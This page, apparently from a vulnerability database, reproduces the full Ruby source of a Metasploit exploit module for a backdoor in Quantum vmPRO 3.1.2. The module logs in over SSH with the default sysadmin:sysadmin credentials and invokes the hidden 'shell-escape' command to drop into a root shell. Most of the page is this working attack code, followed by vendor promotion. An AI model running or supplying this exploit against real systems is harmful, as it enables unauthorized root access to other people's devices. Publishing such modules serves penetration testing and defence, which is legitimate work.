Lucene search
K

Quantum vmPRO Backdoor Command

🗓️ 17 Mar 2014 07:19:27Reported by xistence <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 53 Views

Quantum vmPRO backdoor command allows unauthorized access to restricted SSH shell, leading to a real root bash shell. Tested on Quantum vmPRO 3.1.2

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Quantum vmPRO Backdoor Command',
        'Description' => %q{
          This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
          privileges, can get access to the restricted SSH shell. By using the hidden backdoor
          "shell-escape" command it's possible to drop to a real root bash shell. This module
          has been tested successfully on Quantum vmPRO 3.1.2.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'xistence <xistence[at]0x90.nl>'  # Original discovery and Metasploit module
        ],
        'References' => [
          ['PACKETSTORM', '125760']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Quantum vmPRO 3.1.2', {}],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2014-03-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
        OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def do_login(user, pass)
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })

    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', logger: self)
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USER']
    pass = datastore['PASS']

    print_status("#{rhost}:#{rport} - Attempt to login...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation